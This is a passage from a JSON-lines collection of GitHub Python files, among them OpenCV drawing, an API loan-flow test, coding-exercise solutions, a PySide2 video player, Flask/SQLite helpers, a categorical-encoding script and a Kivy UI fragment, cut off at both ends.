[510, 125], [460, 25]])\n\ncolor = (0, 0, 0)\n# img = cv2.polylines(img, np.array([hex_pts]), True, color, 5)\nimg = cv2.fillPoly(img, np.array([hex_pts]), color)\nimg = cv2.fillPoly(img, np.array([tri_pts]), color)\n\nfor i in range(5,img.shape[0]-5):\n\tfor j in range(5,img.shape[1]-5):\n\t\tif np.sum(img[i,j]) == 0:\n\t\t\t# print(i,j)\n\t\t\t# print(img[i-5:i+5, j-5:j+5].shape)\n\t\t\t# print(bloat_grid.shape)\n\t\t\timg[i-5:i+6, j-5:j+6] = cv2.bitwise_and(img[i-5:i+6, j-5:j+6, :], bloat_grid)\n\ncv2.imshow('img', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"muditsingal/ENPM661_project2","sub_path":"p2_code.py","file_name":"p2_code.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3366955240","text":"\"\"\"\n贷款主流程测试\n\"\"\"\n\nfrom testcases.base_cases import BaseCase\n\n\nclass TestLoanFlow(BaseCase):\n name = \"贷款主流程\"\n\n # 1.注册\n def test_01register(self):\n case = {\n 'title': '用户注册',\n 'url': 'register',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v1\"},'\n '\"json\": {\"mobile_phone\": \"18888888888\", \"pwd\": \"12345678\"}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n\n # 2.登录\n def test_02login(self):\n case = {\n 'title': '用户登录',\n 'url': 'login',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\"},'\n '\"json\": {\"mobile_phone\": \"18888888888\", \"pwd\": \"12345678\"}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n # 测试成功需要将返回的Auth绑定到类属性中给下面的函数使用\n self.__class__.token = self.response.json()['data']['token_info']['token']\n self.__class__.member_id = self.response.json()['data']['id']\n\n\n # 3.充值\n\n def test_03recharge(self):\n case = {\n 'title': '用户充值',\n 'url': 'recharge',\n 'method': 'post',\n 'request': '{\"headers\": {\"X-Lemonban-Media-Type\": \"lemonban.v2\",\"Authorization\":\"Bearer #token#\"},'\n '\"json\": {\"member_id\":#member_id#,\"amount\":666}}',\n 'status_code': 200,\n 'expect': '{\"code\": 0, \"msg\": \"OK\"}'\n }\n self.checkout(case)\n\n\n\n","repo_name":"neilzhang1/autoTest","sub_path":"testcases/test_loan_flow.py","file_name":"test_loan_flow.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9541487180","text":"# P1464 Function https://www.luogu.com.cn/problem/P1464\n# https://www.luogu.com.cn/record/70293156\n\nfrom typing import Dict, Tuple\n\nmem: Dict[Tuple[int, int, int], int] = {}\nresult = ''\n\n\ndef w(a: int, b: int, c: int) -> int:\n param = (a, b, c)\n if param not in mem:\n if a <= 0 or b <= 0 or c <= 0:\n mem[param] = 1\n elif a > 20 or b > 20 or c > 20:\n mem[param] = w(20, 20, 20)\n elif a < b and b < c:\n mem[param] = w(a, b, c - 1) + w(a, b - 1, c - 1) - w(a, b - 1, c)\n else:\n mem[param] = w(a - 1, b, c) + w(a - 1, b - 1, c) + w(\n a - 1, b, c - 1) - w(a - 1, b - 1, c - 1)\n return mem[param]\n\n\nwhile True:\n a, b, c = map(int, input().split())\n if a == -1 and b == -1 and c == -1:\n break\n result += f'w({a}, {b}, {c}) = {w(a,b,c)}\\n'\nprint(result, end='')\n","repo_name":"frederick-wang/algorithm-exercises","sub_path":"luogu/P1464 Function/test.legacy.py","file_name":"test.legacy.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71486166811","text":"import mailcap\n\nimport cv2\nfrom PySide2.QtGui import QPixmap, QImage\nimport sys\nfrom PySide2.QtWidgets import *\nfrom PySide2.QtCore import *\nfrom PySide2.QtMultimediaWidgets import QVideoWidget\nfrom PySide2.QtMultimedia import QMediaPlayer, QMediaContent\nfrom PySide2.QtGui import QIcon\nimport qimage2ndarray\n\nclass VideoWindow(QMainWindow):\n\n def __init__(self, parent=None):\n super(VideoWindow, self).__init__(parent)\n self.setWindowTitle(\"Video Player\")\n\n self.imageLabel = QLabel()\n self.imageLabel.setFrameStyle(QFrame.Panel | QFrame.Sunken)\n self.imageLabel.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored)\n self.imageLabel.setScaledContents(True)\n self.imageLabel.setPixmap(QPixmap())\n\n self.playButton = QPushButton()\n self.playButton.setEnabled(False)\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.playButton.clicked.connect(self.play)\n\n self.btn_Trans = QPushButton('Trans')\n self.btn_Trans.setEnabled(False)\n self.btn_Trans.clicked.connect(self.Trans)\n\n self.btn_af_bf = QPushButton('After')\n self.btn_af_bf.setEnabled(False)\n self.btn_Trans.clicked.connect(self.After)\n\n self.btn_save = QPushButton('Save')\n self.btn_save.setEnabled(False)\n self.btn_Trans.clicked.connect(self.Save)\n\n self.frame_timer = QTimer()\n self.frame_timer.timeout.connect(self.videostart)\n\n self.positionSlider = QSlider(Qt.Horizontal)\n self.positionSlider.setRange(0, 0)\n self.positionSlider.sliderMoved.connect(self.setPosition)\n\n self.errorLabel = QLabel()\n self.errorLabel.setSizePolicy(QSizePolicy.Preferred,\n QSizePolicy.Maximum)\n\n self.cap = cv2.VideoCapture()\n self.fps = 30\n self.step = 0\n self.pause = False\n\n # Create new action\n openAction = QAction(QIcon('open.png'), '&Video', self)\n openAction.setShortcut('Ctrl+O')\n openAction.setStatusTip('Open movie')\n openAction.triggered.connect(self.openFile)\n\n # Create exit action\n exitAction = QAction(QIcon('exit.png'), '&Exit', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.exitCall)\n\n # Load Model action\n loadAction = QAction(QIcon('open.png'), '&Model', self)\n loadAction.setShortcut('Ctrl+M')\n loadAction.setStatusTip('Load Model')\n loadAction.triggered.connect(self.openModel)\n\n # Create menu bar and add action\n menuBar = self.menuBar()\n fileMenu = menuBar.addMenu('&File')\n fileMenu.addAction(loadAction)\n fileMenu.addAction(openAction)\n fileMenu.addAction(exitAction)\n\n # Create a widget for window contents\n wid = QWidget(self)\n self.setCentralWidget(wid)\n\n # Create layouts to place inside widget\n controlLayout = QHBoxLayout()\n controlLayout.setContentsMargins(0, 0, 0, 0)\n controlLayout.addWidget(self.playButton)\n controlLayout.addWidget(self.positionSlider)\n\n # Set List Widget\n self.listImage = QListWidget()\n self.listImage.setAlternatingRowColors(True)\n\n self.listObject = QListWidget()\n self.listObject.setAlternatingRowColors(True)\n\n layout = QHBoxLayout()\n\n # Set Left Box Layer\n L_VBox = QVBoxLayout()\n L_VBox.addWidget(self.imageLabel)\n L_VBox.addLayout(controlLayout)\n L_VBox.addWidget(self.errorLabel)\n\n # Set Right Box Layer\n R_widget = QWidget()\n R_VBox = QVBoxLayout()\n\n R_VBox.addWidget(self.listImage)\n R_VBox.addWidget(self.listObject)\n R_VBox.addWidget(self.btn_Trans)\n R_VBox.addWidget(self.btn_af_bf)\n R_VBox.addWidget(self.btn_save)\n R_widget.setLayout(R_VBox)\n R_widget.setFixedWidth(200)\n\n # Set Main window\n layout.addLayout(L_VBox)\n layout.addWidget(R_widget)\n\n # Set widget to contain window contents\n wid.setLayout(layout)\n\n def Trans(self):\n pass\n def After(self):\n pass\n def Save(self):\n pass\n def videostart(self):\n if self.step >= self.cap.get(cv2.CAP_PROP_FRAME_COUNT):\n return\n frame = self.video_array[self.step]\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n image = qimage2ndarray.array2qimage(frame)\n\n self.imageLabel.setPixmap(QPixmap.fromImage(image))\n self.step += 1\n self.positionSlider.setValue(self.step)\n\n def openModel(self):\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Movie\",\n QDir.homePath())\n if fileName != '':\n self.listImage.addItem(fileName)\n\n def openFile(self):\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open Movie\",\n QDir.homePath())\n\n if fileName != '':\n self.playButton.setEnabled(True)\n self.setWindowTitle(fileName.split('/')[-1])\n self.cap.open(fileName)\n self.fps = self.cap.get(cv2.CAP_PROP_FPS)\n self.hallframecount = self.cap.get(cv2.CAP_PROP_FRAME_COUNT)\n self.positionSlider.setMaximum(self.hallframecount)\n self.video_array = []\n\n i = 0\n while i <= self.cap.get(cv2.CAP_PROP_FRAME_COUNT):\n ret, frame = self.cap.read()\n self.video_array.append(frame)\n i += 1\n\n\n def exitCall(self):\n sys.exit(app.exec_())\n\n def play(self):\n if not self.pause:\n self.frame_timer.start(int(1000 // self.fps))\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPause))\n else:\n self.frame_timer.stop()\n self.playButton.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n self.pause = not self.pause\n\n def mediaStateChanged(self, state):\n if self.mediaPlayer.state() == QMediaPlayer.PlayingState:\n self.playButton.setIcon(\n self.style().standardIcon(QStyle.SP_MediaPause))\n else:\n self.playButton.setIcon(\n self.style().standardIcon(QStyle.SP_MediaPlay))\n\n def positionChanged(self, position):\n self.positionSlider.setValue(position)\n\n def durationChanged(self, duration):\n self.positionSlider.setRange(0, duration)\n\n def setPosition(self, position):\n self.step = position\n\n def handleError(self):\n self.playButton.setEnabled(False)\n self.errorLabel.setText(\"Error: \" + self.mediaPlayer.errorString())\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n player = VideoWindow()\n player.resize(640, 480)\n player.show()\n sys.exit(app.exec_())","repo_name":"msoo6465/python_practice","sub_path":"gui_basic/videoPlayer.py","file_name":"videoPlayer.py","file_ext":"py","file_size_in_byte":6892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39831021586","text":"from webpage.config import *\nimport sqlite3\nfrom flask import g\n\nDATABASE = 'webpage/static/spectro_scope.db'\n\ndef connect_db():\n return sqlite3.connect('webpage/static/spectro_scope.db')\n\ndef delete_db(app):\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"DELETE FROM spectro_scope\")\n conn.commit()\n conn.close()\n\ndef load_db(app):\n \n spectro_scope_config = {}\n # Create empty list for appending every value\n config_data = list()\n\n spectro_scope_config['integration_time'] = INTEGRATION_TIME\n config_data.append(spectro_scope_config['integration_time'])\n\n spectro_scope_config['integration_factor'] = INTEGRATION_FACTOR\n config_data.append(spectro_scope_config['integration_factor'])\n\n spectro_scope_config['threshold'] = THRESHOLD\n config_data.append(spectro_scope_config['threshold'])\n\n # Transform config_data list into a tuple\n config_data = tuple(config_data)\n\n # Insert tuple with config data into database\n with app.app_context():\n conn = connect_db()\n c = conn.cursor()\n c.execute(\"INSERT INTO spectro_scope VALUES (?,?,?)\", config_data)\n conn.commit()\n conn.close()\n\ndef init_db(app):\n conn = connect_db()\n c = conn.cursor()\n try:\n c.execute('''create table spectro_scope (INTEGRATION_TIME real,\n INTEGRATION_FACTOR real,\n THRESHOLD int\n )''')\n load_db(app)\n\n except sqlite3.OperationalError as e:\n print('table spectro_scope already exists' in str(e))\n conn.commit()\n conn.close()\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n return db\n\n# Function for sql UPDATE statement string building\ndef sql_stat_build(str1,str2,cont,listM,valueSP): \n # If value is threshold convert to int\n if str2 == \"THRESHOLD=?\":\n listM.append(int(valueSP))\n else: \n listM.append(float(valueSP))\n\n if cont == 0:\n str1 += str2\n else:\n str1 += \",\" + str2\n\n return str1\n\ndef set_spectro_scope(app,**spectro_scope_config):\n with app.app_context():\n conn = connect_db()\n # Aux variable for value control\n value_control = 0\n # Create string were SQL statements will be added\n string_sql = \"UPDATE spectro_scope SET \"\n # Create empty list were values to update will be appended\n l_spectro_scope = []\n\n configuration_mapping = {\n 'integration_time' : 'INTEGRATION_TIME',\n 'integration_factor' : 'INTEGRATION_FACTOR',\n 'threshold' : 'THRESHOLD',\n }\n\n for variable in configuration_mapping.keys():\n if spectro_scope_config[variable]:\n config_str = f\"{configuration_mapping[variable]}=?\"\n string_sql = sql_stat_build(string_sql, config_str, value_control, l_spectro_scope, spectro_scope_config[variable])\n value_control+=1\n\n # Convert list into tuple\n l_spectro_scope = tuple(l_spectro_scope)\n \n # Execute UPDATE statement\n conn.execute(string_sql,l_spectro_scope)\n\n conn.commit()\n conn.close()\n\ndef get_spectro_scope(param,app):\n with app.app_context():\n g.db = connect_db()\n config_table = g.db.execute('select '+param+' from spectro_scope')\n result = 0\n try:\n result = config_table.fetchall()[0][0]\n except:\n result = 0\n\n g.db.close()\n return result\n","repo_name":"spectro-pointer/spectroscope-OceanOptics","sub_path":"webpage/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3783,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4872690809","text":"# 문제\r\n# 9개의 서로 다른 자연수가 주어질 때, 이들 중 최댓값을 찾고 그 최댓값이 몇 번째 수인지를 구하는 프로그램을 작성하시오.\r\n#\r\n# 예를 들어, 서로 다른 9개의 자연수\r\n#\r\n# 3, 29, 38, 12, 57, 74, 40, 85, 61\r\n#\r\n# 이 주어지면, 이들 중 최댓값은 85이고, 이 값은 8번째 수이다.\r\n#\r\n# 입력\r\n# 첫째 줄부터 아홉 번째 줄까지 한 줄에 하나의 자연수가 주어진다. 주어지는 자연수는 100 보다 작다.\r\n#\r\n# 출력\r\n# 첫째 줄에 최댓값을 출력하고, 둘째 줄에 최댓값이 몇 번째 수인지를 출력한다.\r\n\r\n\r\nnum = int(input(\"서로 다른 자연수를 N만큼 입력하세요 : \"))\r\ninput_list = []\r\n\r\n\r\ndef find_max_value():\r\n\r\n print(f\"{num} 만큼 입력하셨습니다\")\r\n print(\"=\" * 5)\r\n for i in range(num):\r\n value = int(input())\r\n input_list.append(value)\r\n print(\"=\" * 5)\r\n\r\n print(\r\n f\"최대값= {max(input_list)} / 위치= {input_list.index(max(input_list))+1} 번째에 있습니다 \"\r\n )\r\n\r\n\r\nfind_max_value()\r\n","repo_name":"ksm0207/Algorithm","sub_path":"Part #3/example02.py","file_name":"example02.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20284992105","text":"class Solution:\n \"\"\"20190902\"\"\"\n\n def minDistance(self, word1: str, word2: str) -> int:\n \"\"\"\n hard 难度,感觉不太好解决\n 先考虑变为一样长度的,再比较\n 但是存在一样长度的,也可能先删除,再添加的情况\n\n 1\n https://leetcode.com/problems/edit-distance/discuss/159295/Python-solutions-and-intuition\n\n 2\n 方法是好方法,可惜不一定我能想出来\n\n >>> Solution().minDistance('sea','eat')\n 2\n >>> Solution().minDistance('intention','execution')\n 5\n \"\"\"\n m = len(word1)\n n = len(word2)\n table = [[0] * (n + 1) for _ in range(m + 1)]\n\n for i in range(m + 1):\n table[i][0] = i\n for j in range(n + 1):\n table[0][j] = j\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if word1[i - 1] == word2[j - 1]:\n table[i][j] = table[i - 1][j - 1]\n else:\n table[i][j] = 1 + min(table[i - 1][j], table[i][j - 1], table[i - 1][j - 1])\n return table[-1][-1]\n\n\nif __name__ == '__main__':\n import doctest\n\n doctest.testmod(verbose=True)\n","repo_name":"pingfangx/pythonx","sub_path":"ToolsX/leetcode/0072/0072_2.py","file_name":"0072_2.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"32"} +{"seq_id":"16040433114","text":"import os\nimport string\nimport joblib\nimport numpy as np\nimport pandas as pd\nfrom . import dispatcher\nimport category_encoders as ce\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\n\nKFOLDS_DATA = os.environ.get('KFOLDS_DATA')\nNOM_ENC = os.environ.get('NOM_ENCODER')\nENCODED_DATA = os.environ.get('ENCODED_DATA')\nTEST_DATA = os.environ.get('TEST_DATA')\nENCODED_TEST_DATA = os.environ.get('ENCODED_TEST_DATA')\nTRAINING_DATA = os.environ.get('TRAINING_DATA')\n\ndef apply_encoding(encoding, df, cols = None, mapping = None, n_components = None, save = True):\n if cols == None:\n df = df.astype('str')\n else: \n df[cols] = df[cols].astype('str')\n\n if encoding == 'Ordinal':\n '''\n mapping : [{'col': 'ord_1', 'mapping': {'Novice': 5, 'Contributor': 4, 'Expert': 3, 'Master': 2, 'Grandmaster': 1}},\n {'col': 'ord_2', 'mapping': {'Freezing': 6, 'Cold': 5, 'Warm': 4, 'Hot': 3, 'Boiling Hot': 2, 'Lava Hot': 1}},\n {'col': 'ord_3', 'mapping': {i: ord(i)-ord('a')+1 for i in string.ascii_lowercase[:15]}},\n {'col': 'ord_4', 'mapping': {i: ord(i)-ord('A')+1 for i in string.ascii_uppercase}}]\n '''\n encoder = ce.ordinal.OrdinalEncoder(cols = cols, mapping=mapping)\n df = encoder.fit_transform(df)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n\n elif encoding == 'OneHot':\n encoder = ce.OneHotEncoder(cols=cols)\n df = encoder.fit_transform(df)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n\n elif encoding == 'Hashing':\n encoder = ce.hashing.HashingEncoder(cols = cols, n_components = n_components)\n df = encoder.fit_transform(df)\n rename = {'col_'+str(i): cols[0] + '_' +str(i) for i in range(n_components)}\n df.rename(columns = rename, inplace = True)\n print('Encoded, Columns: ' + str(len(df.columns)))\n if save:\n if cols == None:\n name = 'allcols'\n else:\n name = ''.join(cols)\n joblib.dump(encoder, f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n return df\n\ndef encode_test_data(df, cols = None, rename_cols = False, n_components = None):\n '''\n rename_cols - to be used with HashingEncoder to rename the cols.\n '''\n if cols == None:\n df = df.astype('str')\n encoder = joblib.load(f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\allcols_encoder.pkl')\n df = encoder.transform(df) \n return df\n \n df[cols] = df[cols].astype('str')\n name = ''.join(cols)\n encoder = joblib.load(f'F:\\\\Workspace\\\\CFEC2\\\\models\\\\{name}_encoder.pkl')\n df = encoder.transform(df)\n if rename_cols:\n rename = {'col_'+str(i): cols[0] + '_' + str(i) for i in range(n_components)}\n df.rename(columns = rename, inplace = True)\n\n print(', '.join(cols) + ' Encoded, Columns: ' + str(len(df.columns)))\n return df\n\nif __name__ == '__main__': \n df = pd.read_csv(TRAINING_DATA)\n orig_train = df.copy()\n df_test = pd.read_csv(TEST_DATA)\n # orig_test = df_test.copy()\n\n df = df.drop(['target'], axis = 1)\n # df_test = df_test.drop(['id', 'day', 'month'], axis = 1)\n\n # fill NaN values with most frequent value in the column.\n df_test = df_test.fillna(df.apply(lambda x: x.value_counts().idxmax()))\n\n #Let's apply One-Hot encoding to the binary variables first\n #convert the data to string type as ce encoders don't work with int.\n df = apply_encoding('OneHot', df, cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4', 'nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4'])\n df_test = encode_test_data(df_test, cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4', 'nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4'])\n print(df.columns)\n print(df_test.columns)\n\n #Let's encode high-cardinality nominal features [nom_5-nom_9].\n n_components = [11, 11, 8, 8, 12]\n columns = ['nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9']\n for i, x in enumerate(columns):\n df = apply_encoding('Hashing', df, cols=[x], n_components = n_components[i])\n df_test = encode_test_data(df_test, cols = [x], rename_cols = True, n_components = n_components[i])\n \n # We'll use ord_0 as is.\n df['ord_0'] = df['ord_0'].astype('float64').astype('int32')\n df_test['ord_0'] = df_test['ord_0'].astype('float64').astype('int32')\n print('ord_0 encoded, Columns: ' + str(len(df.columns)))\n\n mapping=[{'col': 'ord_1', 'mapping': {'Novice': 5, 'Contributor': 4, 'Expert': 3, 'Master': 2, 'Grandmaster': 1}},\n {'col': 'ord_2', 'mapping': {'Freezing': 6, 'Cold': 5, 'Warm': 4, 'Hot': 3, 'Boiling Hot': 2, 'Lava Hot': 1}},\n {'col': 'ord_3', 'mapping': {i: ord(i)-ord('a')+1 for i in string.ascii_lowercase[:15]}}, # mapping alphabets to numbers\n {'col': 'ord_4', 'mapping': {i: ord(i)-ord('A')+1 for i in string.ascii_uppercase}}] # mapping alphabets to numbers\n\n df = apply_encoding('Ordinal', df, mapping = mapping)\n df_test = encode_test_data(df_test)\n print(df.columns)\n\n #We'll apply binary encoding to ordinal features with high cardinality\n df.to_csv(ENCODED_DATA, index=False)\n df_test.to_csv(ENCODED_TEST_DATA, index = False)\n\n # # We'll encode ord_5 with OrdinalEncoder without any mapping because we don't know anything about it.\n # cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4', 'nom_0', 'nom_1',\n # 'nom_2', 'nom_3', 'nom_4', 'nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9',\n # 'ord_0', 'ord_1', 'ord_2', 'ord_3', 'ord_4', 'ord_5', 'day', 'month']\n # print(cols)\n # # df = apply_encoding('Ordinal', df, cols = cols)\n # # df_test = encode_test_data(df_test, cols = cols)\n\n # scaler = StandardScaler()\n # df[cols] = scaler.fit_transform(df[cols])\n # df_test[cols] = scaler.fit_transform(df_test[cols])\n # print(df)\n\n # # df['kfolds'] = orig_train['kfolds']\n # df['target'] = orig_train['target']\n # # df_test['id'] = orig_test['id']","repo_name":"sharma-harish/ML_Framework","sub_path":"src/categorical_features.py","file_name":"categorical_features.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41703476787","text":"import sys, os\nfrom os.path import dirname, join, abspath\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\nfrom mind import *\n\n#CARPETAS DEL PROYECTO\npatch = dirname(dirname(abspath(__file__)))\nasset = patch + '/_assets/drawable-mdpi/'\nfont = patch + '/_fonts/'\nsound = patch + '/_sounds/'\nbehavior = patch + '/_behavior/'\n\nprint (\".: ASSETS DIR\",asset)\nprint (\".: FONTS DIR\" ,font)\nprint (\".: SOUND DIR\" ,sound)\nprint (\".: BEHAVIOR DIR\" ,behavior)\nclass Label(Label):\n font_name = StringProperty(font + \"Roboto-Regular.ttf\")\nclass Relatstencil(RelativeLayout,StencilView): pass\n\n\n\nclass especialbutton(RelativeLayout):\n posx = NumericProperty(0)\n posy = NumericProperty(0)\n opa = NumericProperty(.35)\n size_hint_y = NumericProperty(None)\n \n height = NumericProperty(dp(36))\n \n \n def __init__(self,**kwargs):\n super().__init__()\n thelabel = Label(markup = True,text = \"[b]Dale un Icono\",)\n self.wid = Relatstencil(size = (125,self.height), size_hint = (None,None))\n\n\n Clock.schedule_interval(lambda x: self.animate(), 3.0)\n \n with self.wid.canvas.before:\n Color(1.0, 0.396078431372549, 0.6235294117647059, 1.0)\n RoundedRectangle(size = (125,self.height),segments = 4, pos = (0,0),group = \"asd\")\n Color(1,1,1,1)\n Mesh(vertices=[self.posx+0, self.posy+0, 0, 0,self.posx+75, self.posy+50, 0, 0,self.posx+125, self.posy+50, 0, 0,self.posx+50, self.posy+0, 0, 0], indices=[0,1,2,3], mode = 'triangle_fan',group = \"asd\")\n \n \n\n \n self.add_widget(self.wid)\n self.wid.add_widget(thelabel)\n \n \n\n self.thelabel = thelabel\n def animate(self,*args):\n Animation.stop_all(self, 'posx')\n Animation.stop_all(self, 'opa')\n Animation.stop_all(self.thelabel, 'opacity')\n \n \n x = (Animation(posx = 125, opa = .10, d = .75, t = 'in_expo' ) \n + Animation(posx = 250, opa = .35, d = .75, t = 'out_expo' )\n + Animation(posx = -125, d = 0 ))\n \n \n y = (\n Animation(opacity = .5, d = .75, t = 'in_expo' ) \n + Animation(opacity = 1, d = .75, t = 'out_expo' )) \n y.start(self.thelabel)\n x.start(self) \n def change_mode(self, mode, *largs):\n self.mesh.mode = mode\n\n def on_posx(self,*args):\n self.wid.canvas.before.remove_group(\"asd\")\n \n with self.wid.canvas.before:\n Color(1.0, 0.396078431372549, 0.6235294117647059, 1.0)\n RoundedRectangle(size = (125,self.height),segments = 4, pos = (0,0),group = \"asd\")\n Color(1,1,1,self.opa)\n Mesh(vertices=[self.posx+0, self.posy+0, 0, 0,self.posx+75, self.posy+50, 0, 0,self.posx+125, self.posy+50, 0, 0,self.posx+50, self.posy+0, 0, 0], indices=[0,1,2,3], mode = 'triangle_fan',group = \"asd\")\n \nclass DisplayMenu(GridLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(64))\n rows = 1\n class DisplayMenuItem(ButtonBehavior, RelativeLayout):\n size_hint = (None, 1)\n width = NumericProperty(dp(64))\n insideimgsize = ListProperty([dp(64),dp(64)])\n def __init__(child,**kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1,1,.5,1)\n Rectangle(source = kwargs[\"source\"], size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animate())\n child.source = kwargs[\"source\"]\n \n def animate(child, *args): (Animation(insideimgsize = [dp(64*.70),dp(64*.70)] , d = .25/2.5, t = 'out_quart') + Animation(insideimgsize = [dp(64),dp(64)] , d = .5*.90, t = 'out_back')).start(child)\n def on_insideimgsize(child, *args):\n child.canvas.clear()\n with child.canvas:\n Color(1,1,.5,1)\n Rectangle(source = child.source, size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n three = [\"hud15\",\"hud14\",\"hud16\"]\n this.add_widget(Label())\n for i in range(3): this.add_widget(this.DisplayMenuItem(source = asset + three[i] + \".png\"))\n this.add_widget(Label())\n \nclass Display(ButtonBehavior,RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(64))\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n this.add_widget(Label(text = \"[color=#000000]00:00:00\",markup = True, font_size = 64))\n \n \n \nclass LyricsDisplay(RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(20))\n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n this.add_widget(Label(text = \"[color=#000000]0 Horas, 0 Minutos y 0 Segundos\",markup = True, font_size = 20))\n \nclass BottomNavigatorScroll(ScrollView):\n NoItems = NumericProperty(0)\n catch_Scrollposx = NumericProperty(0)\n CurrentAnimation = None\n \n def __init__(this,**kwargs):\n super().__init__(**kwargs)\n \n this.bind(on_touch_down = lambda u,z: this.prepare())\n this.bind(on_scroll_stop = this.getcloser)\n this.bind(on_scroll_start = lambda u,z: setattr(this, 'catch_Scrollposx', this.scroll_x))\n \n \n def prepare(this,*args):\n try:\n Animation.stop_all(this, 'scroll_x')\n print(\"Canceled.\")\n except:\n print(\"There is no Currentanimation to cancel.\")\n \n def getcloser(this, *args):\n straight = -1\n print(straight)\n if this.scroll_x > this.catch_Scrollposx: straight *= -1\n \n print (this.NoItems)\n unit = 1.0 / (this.NoItems)\n print (straight)\n list = []\n c = 0\n list.append(0)\n for i in range(this.NoItems):\n list.append((unit) * (i+1) + ((unit/(this.NoItems-1)) * (i+1)))\n c += 1\n list = list[:-1]\n import pprint\n pp = pprint.PrettyPrinter(depth=6)\n \n \n prox = min(list, key=lambda x:abs(x-(this.scroll_x+(.25*.30*straight))))\n this.CurrentAnimation = Animation(scroll_x = prox, d = .25, t = 'out_back')\n this.CurrentAnimation.start(this)\n print(list)\n\nclass TopChooser(RelativeLayout):\n size_hint = (1,None)\n height = NumericProperty(dp(94))\n \n class TopChooserTimericon(RelativeLayout):\n size_hint = (None,None)\n height = NumericProperty(dp(24))\n width = NumericProperty(dp(24))\n pos_hint = DictProperty({'center_y':.75})\n def __init__(child, **kwargs):\n super().__init__()\n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = asset + \"clock.png\", size = (child.width, child.height))\n \n def on_pos(child, *args):\n child.canvas.clear()\n with child.canvas:\n Rectangle(source = asset + \"clock.png\", size = (child.width, child.height))\n \n class TopChooserItem(ButtonBehavior, RelativeLayout):\n size_hint = (None, 1)\n width = NumericProperty(dp(64))\n insideimgsize = ListProperty([dp(64),dp(64)])\n def __init__(child,**kwargs):\n super().__init__()\n \n with child.canvas:\n Color(1,1,1,1)\n Rectangle(source = kwargs[\"source\"], size = child.insideimgsize, pos = (32 - child.insideimgsize[0]/2, 47 - child.insideimgsize[1]/2 ))\n \n child.bind(on_release = lambda x: child.animate())\n child.source = kwargs[\"source\"]\n\n def animate(child, *args): (Animation(insideimgsize = [dp(32),dp(32)] , d = .25/2, t = 'out_quart') + Animation(insideimgsize = [dp(64),dp(64)] , d = .25/2, t = 'out_expo')).start(child)\n def 